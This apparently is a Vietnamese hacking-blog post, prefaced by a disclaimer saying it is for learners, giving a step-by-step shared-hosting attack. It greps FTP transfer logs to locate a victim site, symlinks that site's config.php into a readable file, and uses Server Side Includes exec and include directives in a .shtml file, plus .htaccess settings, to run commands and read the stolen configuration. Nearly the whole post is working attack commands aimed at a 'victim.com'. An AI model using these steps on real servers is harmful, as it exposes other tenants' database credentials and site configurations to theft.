Vài lời cho các bạn !

Blog được xây dựng nhằm cung cấp, sưu tầm nguồn hướng dẫn cho các newbie học tập về hacking website, chứ không mang tính chất vẽ đường cho ai đó đi phá hoại(deface) nhằm gây tổn hại cho website hay sever nào đó. Mong you hãy coi đây như là cuốn ebook hay và bổ ích, cần là giở để xem. và hãy tận dụng nó đúng mục đích ! thanks !

Friday, January 20, 2012

Shtml Bypass View Symlink - Server Side Includes

I. Server Side Includes
II. Find Victim:
cd /var/log/proftpd
more xferlog.*|grep victim.com
cat xferlog.*|grep victim.com
or go to step IV
<!--#exec cmd="more xferlog.*|grep victim.com" -->

III. Symlink:

ln -s /home/...../public_html/config.php config.txt
or go to step IV
<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->
IV. View - Use Server Side Includes:
Create cmd.shtml with content:
<!--#include virtual="config.txt" -->

V. Note:

.htaccess
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

No comments:

Post a Comment